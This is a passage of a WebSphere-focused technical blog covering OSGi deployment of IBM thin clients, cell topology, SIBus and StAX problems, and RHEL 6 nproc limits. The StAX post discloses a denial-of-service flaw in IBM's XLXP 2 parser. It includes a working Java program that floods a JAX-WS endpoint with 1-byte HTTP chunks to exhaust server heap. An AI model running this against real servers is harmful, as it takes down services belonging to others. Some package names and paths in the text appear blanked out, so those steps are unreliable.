The error occurs when Spring attempts to look up the JMS connection factory from JNDI. It is actually caused by an issue in the packaging of the IBM artifacts. The SIB and EJB thin clients both have javax.resource.spi in their Import-Package and Export-Package directives. Since that package is not exported by any other bundle deployed on ServiceMix, the OSGi runtime has two possibilities to resolve this situation: either it wires the javax.resource.spi import from the EJB thin client to the SIB thin client bundle or vice versa. The problem is that the javax.resource.spi package in the SIB thin client is incomplete: it contains fewer classes than the same package in the EJB thin client. If the OSGi runtime selects the package from the SIB thin client bundle, then this leads to the NoClassDefFoundError shown above.

One solution would be to change the order of installation of the two bundles in order to convince the OSGi runtime to select the javax.resource.spi exported by the EJB thin client. However, this would be a very fragile solution. A better solution is to add another bundle that exports the full javax.resource.spi package (without importing it). In that case, the OSGi runtime only has a single possibility to wire the imports/exports for that package, namely to use the version exported by the third bundle. Such a bundle actually exists in the WebSphere runtime and adding it to ServiceMix indeed solves the problem:
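As an illustration of what "exports without importing" means at the manifest level, the manifest of such a pure exporter bundle could look like the following fragment (the symbolic name, version and package attributes are made up for the example and are not those of IBM's javax.j2ee.connector bundle):

```
Manifest-Version: 1.0
Bundle-ManifestVersion: 2
Bundle-SymbolicName: example.javax.resource.api
Bundle-Version: 1.0.0
Export-Package: javax.resource;version="1.6",javax.resource.spi;version="1.6"
```

Because there is no Import-Package entry for javax.resource.spi, the resolver can never substitute another bundle's (possibly incomplete) copy of the package for this bundle's own content.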

osgi:install file:///opt/IBM/WebSphere/AppServer/plugins/javax.j2ee.connector.jar

Problem 4: Class loading issues related to the IBM ORB

After installing that bundle, you should restart ServiceMix to allow it to rewire the bundles properly. The JNDI lookup of the connection factory now succeeds, but another failure occurs when Spring tries to create a connection:

java.lang.NoClassDefFoundError: com/ibm/CORBA/iiop/ORB
  at java.lang.Class.forName0
  at java.lang.Class.forName
  at java.lang.Class.forName0
  at java.lang.Class.forName
  at sun.reflect.NativeMethodAccessorImpl.invoke0
  at sun.reflect.NativeMethodAccessorImpl.invoke
  at sun.reflect.DelegatingMethodAccessorImpl.invoke
  at java.lang.reflect.Method.invoke
  at org.springframework.aop.framework.JdkDynamicAopProxy.invoke
  at com.sun.proxy.$Proxy52.createConnection
  at org.springframework.jms.core.JmsTemplate.execute
  at org.apache.camel.component.jms.JmsConfiguration$CamelJmsTemplate.send
  at org.apache.camel.component.jms.JmsProducer.doSend
  at org.apache.camel.component.jms.JmsProducer.processInOnly
  at org.apache.camel.component.jms.JmsProducer.process
  ... 42 more
Caused by: java.lang.ClassNotFoundException: not found by
  at org.apache.felix.framework.ModuleImpl.findClassOrResourceByDelegation
  at org.apache.felix.framework.ModuleImpl.access$400
  at org.apache.felix.framework.ModuleImpl$ModuleClassLoader.loadClass
  at java.lang.ClassLoader.loadClass
  ... 70 more

Interestingly, if one installs the ORB fragment before the EJB thin client, then the Camel route fails much earlier (during the creation of the InitialContext) with an error that is different, but related to the same class:

org.omg.CORBA.INITIALIZE: can't instantiate default ORB implementation  vmcid: 0x0  minor code: 0  completed: No
  at org.omg.CORBA.ORB.create_impl
  at org.omg.CORBA.ORB.init
  ... 68 more
Caused by: java.lang.ClassCastException: cannot be cast to org.omg.CORBA.ORB
  at org.omg.CORBA.ORB.create_impl
  ... 74 more

It is not clear whether this is a packaging issue in the IBM artifacts or a bug in Karaf/Felix. A solution is to add the ORB to the endorsed libraries instead of installing it as an OSGi fragment. At first this might seem to be an ugly workaround, but it actually makes sense. In the IBM JRE, these classes are part of the runtime libraries. By adding them to the endorsed libraries one basically makes the Oracle JRE look a bit more like an IBM JRE.

Note that if we endorse the IBM ORB, then it is actually more natural to use the JARs shipped with the IBM JRE instead of the ORB bundle. These JARs can be found in the java/jre/lib directory in the WebSphere installation. We need the following JARs from that directory: ibmcfw.jar, ibmorb.jar and ibmorbapi.jar. After copying these files to the lib/endorsed directory in the ServiceMix installation, remove the ORB fragment:
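
In the bundle listing shown earlier, the WebSphere ORB Fragment has bundle ID 183, so the command would be (adapt the ID to your installation):

```
osgi:uninstall 183
```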


To make the ORB classes visible to the EJB thin client it is necessary to add org.omg.* and* to the org.osgi.framework.bootdelegation property in etc/. Note that this would also be necessary on an IBM JRE. It means that the EJB thin client assumes that boot delegation is enabled for these packages.

Problem 5: Missing classes from

After restarting ServiceMix, one now gets the following error:

java.lang.NoClassDefFoundError: Could not initialize class

If one looks at the first occurrence of the error, one can see that the failure to initialize the CredentialType class is caused by the following exception:

java.lang.ClassNotFoundException: not found by

Inspection of the content of the JMS thin client bundle shows that it contains the package, but is missing the BootHandlerException class. That class is actually part of lib/bootstrap.jar in the WebSphere runtime. We could add that JAR to the endorsed libraries, but in contrast to the ORB classes, this is not a natural solution. It is actually enough to add it to the main class loader used to load Karaf. This can be done by copying the JAR to the lib directory in the ServiceMix installation. Note that the classes will be visible to the SIB thin client because we already added* to the boot delegation list before.

After adding bootstrap.jar and restarting ServiceMix, the sample route now executes successfully! Interestingly, bootstrap.jar is not required when executing the sample in a Java SE environment. This means that the issue occurs on a code path that is only executed in an OSGi environment.

Summary and conclusion

To summarize, the following steps are necessary to deploy the SIB and EJB thin clients as OSGi bundles in ServiceMix:

  1. Copy the following files from the WebSphere installation to the lib/endorsed directory:

    • java/jre/lib/ibmcfw.jar
    • java/jre/lib/ibmorb.jar
    • java/jre/lib/ibmorbapi.jar

    On an IBM JRE, this step would be skipped.

  2. Copy lib/bootstrap.jar from the WebSphere installation to the lib directory.

  3. Add org.omg.* and* to the org.osgi.framework.bootdelegation property in etc/

  4. Create and install the Equinox compatibility bundle as described above.

  5. Install the following bundles from the WebSphere runtime:

    • plugins/javax.j2ee.connector.jar
    • runtimes/
    • runtimes/
  6. Uninstall the geronimo-jms_1.1_spec bundle.

We have also seen that the SIB and EJB thin client bundles have several packaging issues. In particular they appear to have been bundled under the assumption that a certain number of packages are configured for boot delegation. As already argued in relation to the dependency on the org.eclipse.osgi bundle, the reason is probably that they were created for Equinox as a target OSGi runtime. In fact, the assumptions made about boot delegation are compatible with the default configuration in Equinox. What is more interesting is the fact that these packages also include That package is visible through boot delegation only in WebSphere, but the thin clients are obviously not supposed to be deployed as OSGi bundles in WebSphere...

It should also be noted that the solution was only tested with a very simple scenario. It is possible that in more complex scenarios, additional issues arise.

Finally, given the difficulties to install the thin clients as OSGi artifacts, one may reasonably argue that it might actually be simpler to just repackage them...

Monday, November 4, 2013

How to divide a WebSphere topology into cells

A WebSphere cell is a logical grouping of nodes (each of which runs one or more application servers) that are centrally managed:

  • There is a single configuration repository for the entire cell. Each individual node receives a read-only copy of the part of the configuration relevant for that node.
  • There is a single administrative console for the entire cell. This console is hosted on the deployment manager and allows one to manage the configuration repository as well as the runtime state of all WebSphere instances in the cell.
  • The MBean servers in the cell are federated. By connecting to the deployment manager, one can interact with any MBean on any WebSphere instance in the cell.

One of the primary tasks when designing a WebSphere topology is to decide how WebSphere instances should be grouped into cells. There is no golden rule, and this generally requires a tradeoff between multiple considerations:

  1. Applications deployed on different clusters can easily communicate over JMS if the clusters are in the same cell. The reason is that SIBuses are cell scoped resources and that each WebSphere instance in a cell has information about the topology of the cell, so that it can easily locate the messaging engine to connect to. This means that making two applications in the same cell interact with each other over JMS only requires minimal configuration, even if they are deployed on different clusters. On the other hand, doing this for applications deployed in different cells requires more configuration because WebSphere instances in one cell are not aware of the messaging topology in the other cell.

  2. Setting up remote EJB calls over IIOP between applications deployed on different clusters is easier if the clusters are in the same cell: the applications don't need to make any particular provisions to support this, and no additional configuration is required on the server. In that case, making two applications interact over IIOP only requires using a special JNDI name (such as cell/clusters/cluster1/ejb/SomeEJB) that routes the requests to the right target cluster. On the other hand, doing this for applications deployed in different cells requires additional configuration:

    • A foreign cell binding needs to be created between the cells.
    • For cells where security is enabled, it is also required to establish trust between these cells, i.e. to exchange the SSL certificates and to synchronize the LTPA keys.
    • Routing and workload management for IIOP works better inside a cell (actually inside a core group, but there is generally a single core group for the entire cell), because the application server that hosts the calling application knows about the runtime state of the members of the target cluster. To get the same quality of service for IIOP calls between different cells it is necessary to set up core group bridges between the core groups in these cells, and the complexity of the bridge configuration is O(N²), where N is the number of cells involved.
  3. Applications are defined at cell scope and then mapped to target servers and clusters. This implies that application names must be unique in a cell and that it is not possible to deploy multiple versions of the same application under the same name. Deploying multiple versions of the same application therefore requires renaming that application (by changing the value of the display-name element in the application.xml descriptor). Note that this works well for J2EE applications, but not for SCA modules deployed on WebSphere Process Server or ESB. The reason is that during the deployment of an SCA module, WebSphere automatically creates SIBus resources with names that depend on the original application name. In this case, changing application.xml is not enough.

  4. A single Web server instance can be used as a reverse proxy for multiple clusters. However, WebSphere can only maintain the plug-in configuration automatically if the Web server and the clusters are all part of the same cell. Using a single Web server for multiple clusters in different cells is possible but additional procedures are required to maintain that configuration. This means that the larger the cells are, the more flexibility one has for the Web server configuration.

  5. One possible strategy to upgrade WebSphere environments to a new major version is to migrate the configuration as is using the tools (WASPreUpgrade and WASPostUpgrade) provided by IBM. The first step in this process is always to migrate the deployment manager profile. WebSphere supports mixed version cells (as long as the deployment manager has the highest version), so that the individual nodes can be migrated one by one later. Larger cells slightly reduce the amount of work required during an upgrade (because there are fewer deployment managers), but at the price of increased risk: if something unexpected happens during the migration of the deployment manager, the impact will be larger and more difficult to manage.

  6. Some configurations are done at the cell level. This includes e.g. the security configuration (although that configuration can be overridden at the server level). Having larger cells reduces the amount of work required to apply and maintain these configurations.

  7. There are good reasons to use separate cells for products that augment WebSphere Application Server (such as WebSphere Process Server), although technically it is possible to mix different products in the same cell:

    • The current releases of these products are not necessarily based on the latest WebSphere Application Server release. Since the deployment manager must be upgraded first, this may block the upgrade to a newer WebSphere Application Server release.
    • Typically, upgrades of products such as WPS are considerably more complex than WAS upgrades. If both products are mixed in a single cell, then this may slow down the adoption of new WAS versions.

Some of these arguments are in favor of larger cells, while others are in favor of smaller cells. There is no single argument that can be used to determine the cell topology and one always has to do a tradeoff between multiple considerations. There are however two rules that should always apply:

  • A cell should never span multiple environments (development, acceptance, production, etc.).
  • There is a document from IBM titled Best Practices for Large WebSphere Application Server Topologies that indicates that a (single cell) topology is considered large if it contains dozens of nodes with hundreds of application servers. Most organizations are far away from these numbers, so that in practice one can usually consider that there is no upper limit on the number of application servers in a cell.

Sunday, November 3, 2013

Integrating ServiceMix with WebSphere's SIBus

This article describes how to integrate Apache ServiceMix with WebSphere's SIBus. More precisely we will explore how to deploy a Camel route that sends messages to a SIBus destination in WebSphere. We assume that connection factories and queue objects are created using the API described in the Programming to use JMS and messaging directly page in the WebSphere infocenter instead of looking them up using JNDI. This makes the configuration considerably simpler because there is no need to create JNDI objects in the WebSphere configuration.

In this scenario, it's enough to install the SIB thin client and we don't need the EJB thin client and IBM ORB (as would be the case in a scenario that uses JNDI lookups). The SIB thin client can be found in the runtimes directory of the WebSphere installation. It is actually packaged as an OSGi bundle that can be deployed out of the box in ServiceMix. This has been successfully tested with the client from WAS and Note that earlier 8.5 versions seem to have some issues because they actually require the EJB thin client and IBM ORB.

To deploy the SIB thin client, simply use the following command in the ServiceMix console (Adapt the path and version as necessary):

osgi:install -s file:///opt/IBM/WebSphere/AppServer/runtimes/

The thin client should then appear in the list of deployed bundles as follows (Use the osgi:list command to display that list):

[ 182] [Active     ] [            ] [       ] [   80] IBM SIB JMS Thin Client (8.5.0)

We can now create and deploy a Camel route. We will do that using a Spring context file. As mentioned earlier, the necessary connection factory and queue objects will be created using the API. Since Spring supports creating beans using static and instance factory methods (including factory methods with parameters) this can be done entirely in the Spring configuration without writing any code.

The following sample configuration sets up a Camel route that reads files from a directory and sends them to a SIBus destination:

<beans xmlns="http://www.springframework.org/schema/beans"
       xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
       xsi:schemaLocation="http://www.springframework.org/schema/beans
                           http://www.springframework.org/schema/beans/spring-beans.xsd">

  <camelContext xmlns="http://camel.apache.org/schema/spring">
    <route>
      <from uri="file://test"/>
      <to uri="sib:queue:testQ"/>
    </route>
  </camelContext>

  <bean id="jmsFactoryFactory" class="com.ibm.websphere.sib.api.jms.JmsFactoryFactory"
        factory-method="getInstance"/>

  <bean id="testQ"
        factory-bean="jmsFactoryFactory" factory-method="createQueue">
    <constructor-arg value="testQ"/>
  </bean>

  <bean id="testCF" factory-bean="jmsFactoryFactory" factory-method="createConnectionFactory">
    <property name="busName" value="test"/>
    <property name="providerEndpoints" value="isis:7276:BootstrapBasicMessaging"/>
    <property name="targetTransportChain" value="InboundBasicMessaging"/>
  </bean>

  <bean id="sib" class="org.apache.camel.component.jms.JmsComponent">
    <property name="connectionFactory" ref="testCF"/>
    <property name="destinationResolver">
      <bean class="org.springframework.jms.support.destination.BeanFactoryDestinationResolver"/>
    </property>
  </bean>
</beans>
To run this sample, change the queue name, bus name and the provider endpoint as required by your environment. Then copy the Spring context to the deploy directory in your ServiceMix installation. This should create a test directory where you can put the files to be sent to the SIBus destination.

Thursday, October 31, 2013

How to get rid of SIBus queue points in state DELETE_PENDING

Sometimes, when deleting a destination from a SIBus, the corresponding queue point is not deleted from the underlying messaging engine, but remains in state DELETE_PENDING. This manifests itself in three ways:

  1. The queue point is still visible in the runtime view of the messaging engine in the admin console. To see this, go to the admin console page for the messaging engine, switch to the "Runtime" tab and then click on "Queue points".

  2. The MBean for the queue point is still registered by the messaging engine. The state attribute of that MBean will have value DELETE_PENDING.

  3. Each time the messaging engine is started, the following message appears in the logs:

    CWSIP0063I: The local destination <name> with UUID <uuid> has been marked for deletion.

It is not exactly clear under which conditions this issue occurs, but apparently it has to do with the existence of remote queue points, i.e. with the production or consumption of messages through a remote messaging engine.

To clean up these queue points and eliminate the recurring CWSIP0063I messages, use the following wsadmin script:

objName = AdminControl.makeObjectName('WebSphere:type=SIBQueuePoint,*')
queuepoints = AdminControl.queryNames_jmx(objName, None)
for queuepoint in queuepoints:
    name = queuepoint.getKeyProperty("name")
    if (not name.startswith("_") and AdminControl.invoke_jmx(queuepoint, 'getState', [], []) == 'DELETE_PENDING'):
        print 'Found SIBQueuePoint in state DELETE_PENDING: ' + name
        irs = AdminControl.invoke_jmx(queuepoint, 'listInboundReceivers', [], [])
        for ir in irs:
            AdminControl.invoke_jmx(queuepoint, 'flush', [ir], [''])
            print 'Called flush on SIBQueuePoint for inbound receiver: ' + name
        cts = AdminControl.invoke_jmx(queuepoint, 'listRemoteConsumerTransmitters', [], [])
        for ct in cts:
            AdminControl.invoke_jmx(queuepoint, 'flush', [ct], [''])
            print 'Called flush on SIBQueuePoint for remote consumer transmitter: ' + name


  • The flush operations used by the script are actually deprecated, but the documentation doesn't specify which operations should be used instead.
  • The script may fail because the queue may already be deleted after the flush of the SIBInboundReceiver objects. In that case subsequent operations fail because the MBean no longer exists. As a workaround, simply reexecute the script.

Sunday, October 27, 2013

Heap starvation on WebSphere Process Server 6.1 caused by internal cache

Some time ago we had an incident where both members of a WebSphere Process Server 6.1 cluster encountered a heap starvation and needed to be restarted:

That incident occurred after one of the external service providers we connect to reported a problem causing an increase in response time.

Analysis of a heap dump taken before the restart of the WPS servers showed that a large amount of heap (480MB of 1.4GB) was consumed by objects of type$OperationHandlerList. That appears to be an internal data structure used by SCA Web service imports (we are running lots of SCA modules on that cluster). A closer look at OperationHandlerList reveals that this class acts as a cache for objects of type, which is WebSphere's implementation of the javax.xml.rpc.Call API.

In fact, Call objects are used during the invocation of an operation on an SCA import with Web service binding, but they are both stateful and costly to create. To avoid this cost, WPS uses a caching mechanism that takes into account the stateful nature of these objects. Basically, OperationHandlerList appears to be designed as a pool of Call objects that is initially empty and that has a hardcoded maximum size of 100 entries. When an SCA import is invoked, WPS will attempt to retrieve an existing Call object from the pool or create a new one if none is available. After the completion of the invocation, WPS then puts the instance back into the pool for later reuse.

What is important to understand is that there is a separate pool (i.e. a separate OperationHandlerList instance) for each operation defined by each SCA Web service import. In addition, entries in these pools are never expunged. From the explanations given in the previous paragraph it is easy to see that the number of Call objects stored in a given OperationHandlerList instance is therefore equal to the maximum concurrency reached (since the start of the server) for invocations of the corresponding operation. That explains why the heap consumed by these pools may increase sharply after a performance problem with one of the Web services consumed by WPS: in general, a degraded response time of a service provider will cause an increase in concurrency because clients continue to send requests to WPS. That also explains why the memory is never released and the issue has the same symptoms as a memory leak.
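The mechanism described above can be modeled with a few lines of plain Java. This is only a sketch illustrating the behavior, not IBM's actual OperationHandlerList code: the pool retains as many instances as the highest concurrency ever observed, up to the hardcoded cap, and never shrinks.

```java
import java.util.ArrayDeque;
import java.util.Deque;

// Simplified model of a per-operation Call pool (illustrative, not IBM's code).
public class CallPool {
    private static final int MAX_SIZE = 100; // hardcoded cap, as described above

    private final Deque<Object> pool = new ArrayDeque<>();

    // Borrow an instance: reuse a pooled one if available, otherwise create one.
    public synchronized Object borrow() {
        Object call = pool.pollFirst();
        return call != null ? call : new Object(); // stands in for a costly, stateful Call
    }

    // Return the instance to the pool; entries are never expunged.
    public synchronized void release(Object call) {
        if (pool.size() < MAX_SIZE) {
            pool.addFirst(call);
        }
    }

    public synchronized int retainedInstances() {
        return pool.size();
    }
}
```

A burst of 25 concurrent invocations leaves 25 instances in the pool forever, even if traffic later goes back to being sequential; since a single pooled Call object can be large, the retained heap effectively records the concurrency peak.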

As indicated above, there is a separate pool for each operation. This means that there may be a large number of these pools in a given WPS instance. However, this is usually not what causes the problem. The issue may already occur if there is only a limited number of operations for which the maximum concurrency increases. The reason is that an individual Call object may consume a significant amount of memory. E.g. in our case, we found one OperationHandlerList instance (that had reached its maximum capacity of 100 entries) that accounted for 177MB of used heap alone.

Note: At first glance, the issue described in this post seems to match APAR JR35210. However, that APAR simply describes the problem as a memory leak without giving precise information about the conditions that trigger the issue, except that it relates the issue to the usage of dynamic endpoints. However, our findings indicate that the issue is not (necessarily) related to dynamic endpoints. JR35210 may therefore be a different (but related) issue.

Saturday, October 26, 2013

WebSphere problems related to new default nproc limit in RHEL 6

We recently had an incident on one of our production systems running under Red Hat Enterprise Linux where under certain load conditions WebSphere Application Server would fail with an OutOfMemoryError with the following message:

Failed to create a thread: retVal -1073741830, errno 11

Error number 11 corresponds to EAGAIN and indicates that the C library function creating the thread fails because of insufficient resources. Often this is related to native memory starvation, but in our case it turned out that it was the nproc limit that was reached. That limit puts an upper bound on the number of processes a given user can create. It may affect WebSphere because in this context, Linux counts each thread as a distinct process.

Starting with RHEL 6, the soft nproc limit is set to 1024 by default, while in previous releases this was not the case. The corresponding configuration can be found in /etc/security/limits.d/90-nproc.conf. Generally a WebSphere instance only uses a few hundred threads, so this problem may go unnoticed for some time before being triggered by an unusual load condition. You should also take into account that the limit applies to the sum of all threads created by all processes running with the same user as the WebSphere instance. In particular it is not unusual to have IBM HTTP Server running with the same user on the same host. Since the WebSphere plug-in uses a multithreaded processing model (and not an asynchronous one), the nproc limit may be reached if the number of concurrent requests increases too much.

One solution is to remove or edit the 90-nproc.conf file to increase the nproc limit for all users. However, since the purpose of the new default value in RHEL 6 is to prevent accidental fork bombs, it may be better to define new hard and soft nproc limits only for the user running the WebSphere instance. While this is easy to configure, there is one other problem that needs to be taken into account.

For some unknown reasons, sudo (in contrast to su) is unable to set the soft limit for the new process to a value larger than the hard limit set on the parent process. If that occurs, instead of failing, sudo creates the new process with the same soft limit as the parent process. This means that if the hard nproc limit for normal users is lower than the soft nproc limit of the WebSphere user and an administrator uses sudo to start a WebSphere instance, then that instance will not have the expected soft nproc limit. To avoid this problem, you should do the following:

  • Increase the soft nproc limit for the user running WebSphere.
  • Increase the hard nproc limit for all users to the same (or a higher) value, keeping the soft limit unchanged (to avoid accidental fork bombs).
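Assuming WebSphere runs under a user called wasadmin (the user name, file name and limit value here are illustrative), the two bullets above translate into a drop-in file such as:

```
# /etc/security/limits.d/91-websphere.conf
wasadmin  soft  nproc  8192
wasadmin  hard  nproc  8192
*         hard  nproc  8192
```

Per-user entries take precedence over the * entry, and the soft limit for all other users stays at the 1024 default, so accidental fork bombs are still caught.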

Note that you can verify that the limits are set correctly for a running WebSphere instance by determining the PID of the instance and checking the /proc/<pid>/limits file.

Wednesday, October 16, 2013

Quote of the day

The United States of America is prepared to use all elements of our power, including military force, to secure our core interests in the region. We will confront external aggression against our allies and partners, as we did in the Gulf War. We will ensure the free flow of energy from the region to the world. Although America is steadily reducing our own dependence on imported oil, the world still depends on the region’s energy supply, and a severe disruption could destabilize the entire global economy.

Barack Obama, Address to the United Nations General Assembly 2013.

I guess no other US president ever openly expressed the imperialist nature of American foreign policy that clearly...

Friday, October 11, 2013

Broken by design: WebSphere's default StAX implementation (part 1)

Recently I came across an issue in WebSphere's default StAX implementation (XLXP 2) where the parser unexpectedly consumed a huge amount of heap. The issue was triggered by a gzipped XML file containing a base64 encoded PDF document with several megabytes of content. A test showed that although the size of the XML document was of order of 10 MB, XLXP 2 required almost 1 GB of heap to parse the document (without any additional processing). That is of course totally unexpected: for large documents, an XML parser should never require an amount of heap 100 times as large as the size of the XML document.

After investigating the issue (with the XLXP 2 version in WAS), it turned out that the problem with IBM's parser is caused by the combination of three things:

  • Irrespective of the value of the property (XMLInputFactory.IS_COALESCING), the parser will always return a text node in the input document as a single CHARACTERS event (where the precise meaning of "text node" is a sequence of CharData and/or Reference tokens neither preceded nor followed by a CharData or Reference token).

    For readers who are not experts in the StAX specification, this requires some additional explanations. With respect to coalescing, the only requirement stipulated by StAX (which is notoriously underspecified) is that enabling coalescing mode "requires the processor to coalesce adjacent character data". There are two interpretations of this requirement:

    • The first one is that this requirement is simply related to how CDATA sections are processed. If coalescing is enabled, then CDATA section nodes are implicitly converted to text nodes and merged with adjacent text nodes. In non coalescing mode, CDATA sections are reported as distinct events, such that there is one and only one event for each text node and CDATA section in the input document. This interpretation corresponds to the definition of coalescing used by DOM (see DocumentBuilderFactory#setCoalescing()).
    • The second interpretation goes a step further and assumes that in non coalescing mode, the parser should handle text nodes in a way similar to SAX, i.e. split text nodes that are larger than the parser's input buffer into chunks. In this case, a text node is reported as one or more CHARACTERS events. This allows the parser to process text nodes of arbitrary length with constant memory.

    BEA's original reference implementation and XLXP 2 are based on the first interpretation, while SJSXP (the StAX implementation in Oracle's JRE) and Woodstox use the second interpretation. Note that for applications using StAX, this doesn't really make any difference because an application using a StAX parser in non coalescing mode must be written such that it is able to correctly process any sequence of CHARACTERS and CDATA events.

  • XLXP 2 uses a separate buffer for each read operation on the underlying input stream, i.e. for each read operation, the parser will either allocate a new buffer or recycle a previously created buffer that is no longer in use. That is the case even if the previous read operation didn't fill the buffer completely: XLXP 2 will not attempt to read data into the buffer used during the previous read operation. By default, the size of each buffer is 64 KB.

  • When processing character data, the buffers containing the corresponding (encoded) data from the underlying stream remain in use (i.e. cannot be recycled) until the data has been reported back to the application. Note that this is a design choice: the parser could as well have been designed to accumulate the decoded character data in an intermediary buffer and immediately release the original buffers.

This has two consequences:

  • When processing a text node from the input document, all buffers containing chunks of data for that text node remain in use until the parser reaches the end of the text node.
  • If the read operations on the underlying input stream return less than the requested number of bytes (i.e. the buffer size), then these buffers will only be partially filled.

This means that processing a text node may require much more memory than one would expect based on the length of that text node. Since the default buffer size is 64 KB, in the extreme case (where each read operation on the input stream returns a single byte), the parser may need 65536 times more memory than the length of the text node. In the case I came across, the XML document contained a text node of around 9 million characters and the input stream was a GZIPInputStream which returned more or less 600 bytes per read operation. A simple calculation shows that XLXP 2 will require on the order of 900 MB of heap to process that text node.
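
The arithmetic behind that estimate can be sketched as follows (the method name is mine; the figures are the ones from the case described above):

```java
public class WorstCaseMemory {
  // Worst-case heap needed by XLXP 2 to process a single text node:
  // one buffer per read operation, all of which remain in use until
  // the end of the text node is reached.
  static long worstCaseHeap(long textNodeBytes, int bytesPerRead, int bufferSize) {
    long buffers = (textNodeBytes + bytesPerRead - 1) / bytesPerRead;
    return buffers * bufferSize;
  }

  public static void main(String[] args) {
    // ~9 million characters, ~600 bytes per read (GZIPInputStream),
    // 64 KB default buffer size => 15000 buffers, ~937 MB
    long heap = worstCaseHeap(9_000_000L, 600, 64 * 1024);
    System.out.println(heap / (1024 * 1024) + " MB");
  }
}
```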

IBM's reaction to this was that XLXP 2 is "working as designed" (!) and that the issue can be mitigated with the help of two system properties:

  • The first property specifies the size of the buffers described earlier. Setting it to a smaller value than the default 65536 bytes will reduce the amount of unused space. On the other hand, if the value is too small, then this will obviously have an impact on performance. Note that the fact that this parameter is specified as a system property is especially unfortunate, because it will affect all applications running on a given WebSphere instance.
  • The second property was introduced by APAR PM42465 and is related to pooling of XMLStreamReader objects, not buffers. Therefore it has no impact on the problem described here.

However, it should be clear by now that adjusting these system properties doesn't eliminate the problem completely, unless one uses an unreasonably small buffer size. This raises another interesting question: considering that WebSphere's JAX-WS implementation relies on StAX and that XLXP 2 may under certain circumstances allocate an amount of heap that is several orders of magnitude larger than the message size, isn't that a vector for a denial-of-service attack? If it's possible to construct a request that tricks XLXP 2 into reading multiple small chunks from the incoming SOAP message, couldn't this be used to trigger an OOM error on the target application server?

It turns out that unfortunately this is indeed possible. The attack takes advantage of the fact that when WebSphere receives a POST request that uses the chunked transfer encoding, the Web container will deliver each chunk separately to the application. If the request is dispatched to a JAX-WS endpoint this means that each chunk is delivered individually to the StAX parser, which is exactly the attack vector we are looking for. To exploit this vulnerability, one simply has to construct a SOAP message with a moderately large text node (let's say 10000 characters) and send that message to a JAX-WS endpoint using 1-byte chunks (at least for the part containing the text node). To process that text node, XLXP 2 will have to allocate 10000 buffers, each one 64 KB in size (assuming that the default configuration is used), which means that more than 600 MB of heap are required.

The following small Java program can be used to test if a particular (JAX-WS endpoint on a given) WebSphere instance is vulnerable:

import java.io.IOException;
import java.io.OutputStream;
import java.net.Socket;

public class XLXP2DoS {
  private static final String CHARSET = "utf-8";

  public static void main(String[] args) throws Exception {
    String host = "localhost";
    int port = 9080;
    String path = "/myapp/myendpoint";
    Socket socket = new Socket(host, port);
    OutputStream out = socket.getOutputStream();
    out.write(("POST " + path + " HTTP/1.1\r\n"
        + "Host: " + host + ":" + port + "\r\n"
        + "Content-Type: text/xml; charset=" + CHARSET + "\r\n"
        + "Transfer-Encoding: chunked\r\n"
        + "SOAPAction: \"\"\r\n\r\n").getBytes("ascii"));
    writeChunk(out, "<s:Envelope xmlns:s='http://schemas.xmlsoap.org/soap/envelope/'>"
        + "<s:Header><p:dummy xmlns:p='urn:dummy'>");
    // Send the content of the text node in 1-byte chunks.
    for (int i=0; i<10000; i++) {
      writeChunk(out, "A");
    }
    writeChunk(out, "</p:dummy></s:Header><s:Body/></s:Envelope>");
    // Zero-length chunk: terminates the chunked request body.
    out.write("0\r\n\r\n".getBytes("ascii"));
    out.flush();
    socket.close();
  }

  private static void writeChunk(OutputStream out, String data) throws IOException {
    out.write((Integer.toHexString(data.length()) + "\r\n").getBytes("ascii"));
    out.write(data.getBytes(CHARSET));
    out.write("\r\n".getBytes("ascii"));
  }
}

The vulnerability has some features that make it rather dangerous:

  • Since the amount of heap used is several orders of magnitude larger than the message size, it is generally possible to carry out this attack even against application servers with a maximum POST request size configured in the HTTP transport channel settings.
  • An HTTP server in front of the application server doesn't protect against the attack. The reason is that the WebSphere plug-in forwards the chunks unmodified to the target server. The same will be true for most types of load balancers. For reverse proxies other than IBM HTTP Server this may or may not be true. On the other hand, a security gateway (such as DataPower) or an ESB will likely protect against this attack.
  • Since the request is relatively small, it will be difficult to distinguish from other requests and to trace back to its source.

One possible way to fix this vulnerability is to use another StAX implementation, as described in a previous post. In fact, switching the StAX implementation for a given Java EE application also changes the StAX implementation used to process SOAP messages for JAX-WS endpoints exposed by that application. Since WebSphere's JAX-WS implementation is based on Apache Axis2 and Apache Axiom, and the recommended StAX implementation for Axiom is Woodstox, that particular StAX implementation may be the best choice. Note that this may still have some unexpected side effects. In particular, XLXP 2 is known to implement some optimizations that are designed to work together with the JAXB 2 implementation in WebSphere. Obviously these optimizations will no longer work if XLXP 2 is replaced by Woodstox. It is also not clear if using WebSphere's JAX-WS implementation with a non-IBM StAX implementation is supported by IBM, i.e. if you will get help if there is an interoperability issue.

Update: IBM finally acknowledged that there is an issue with XLXP 2 (although they avoided qualifying it as a security issue). See the second part of this article for a discussion about the "fix" IBM applied to solve the issue.

Wednesday, October 2, 2013

Broken by design: changing the StAX implementation in a JEE application on WebSphere

To change the StAX implementation used in a Java EE application it should normally be enough to simply add the JAR with the third party StAX implementation (such as Woodstox) to the application. E.g. if the application is a simple Web application, then it should be enough to add the JAR to WEB-INF/lib. The same is true for the SAX, DOM and XSLT implementations. The reason is that all these APIs (which are part of JAXP) use the so called JDK 1.3 service provider discovery mechanism. That mechanism uses the thread context class loader to locate the service provider (the StAX implementation in this case). On the other hand, the Java EE specification requires that the application server sets the thread context class loader correctly before handing over a request to the application. For a servlet request, this will be the class loader of the Web module, while for a call to an EJB (packaged in an EJB-JAR), this will be the application class loader (i.e. the class loader corresponding to the EAR). That makes it possible to have different applications deployed on the same server use different StAX implementations without the need to modify these applications.
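
The mechanism can be sketched in a few lines. Note that this is a simplified illustration, not the actual JAXP source: the `discover` helper is mine and ignores details such as comment lines in the service file and the fallback to a system property:

```java
import java.io.BufferedReader;
import java.io.InputStream;
import java.io.InputStreamReader;

public class ProviderDiscovery {
  // Simplified sketch of the JDK 1.3 service provider lookup performed by
  // XMLInputFactory.newInstance(): read the provider class name from a
  // META-INF/services resource, using the thread context class loader.
  static String discover(String factoryId) throws Exception {
    ClassLoader tccl = Thread.currentThread().getContextClassLoader();
    InputStream in = tccl.getResourceAsStream("META-INF/services/" + factoryId);
    if (in == null) {
      return null; // no provider found: fall back to a built-in default
    }
    try (BufferedReader r = new BufferedReader(new InputStreamReader(in, "UTF-8"))) {
      String line = r.readLine();
      return line == null ? null : line.trim(); // provider class name
    }
  }

  public static void main(String[] args) throws Exception {
    // On a plain JRE this typically prints null (no third party provider);
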